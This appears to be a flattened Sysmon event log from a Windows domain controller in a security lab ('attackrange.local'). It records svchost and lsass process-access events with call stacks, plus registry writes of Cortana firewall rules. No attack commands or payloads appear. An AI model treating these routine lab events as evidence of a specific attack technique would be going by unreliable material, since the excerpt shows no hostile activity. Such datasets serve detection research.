13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.336{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.977{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{90B42FC2-2534-4BA0-9A53-F71BF8AB4F92}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ|Edge=TRUE| 13241300x800000000000000010703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{ABF01AB1-8776-45B9-92C1-38DDD03E5D79}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 
13241300x800000000000000010702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{F2453044-1613-4AC6-A75D-CC6B7EF13C2B}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x800000000000000010701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.977{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C351D152-24DE-4BFE-8ECB-B4EDC98B8367}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x800000000000000010700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
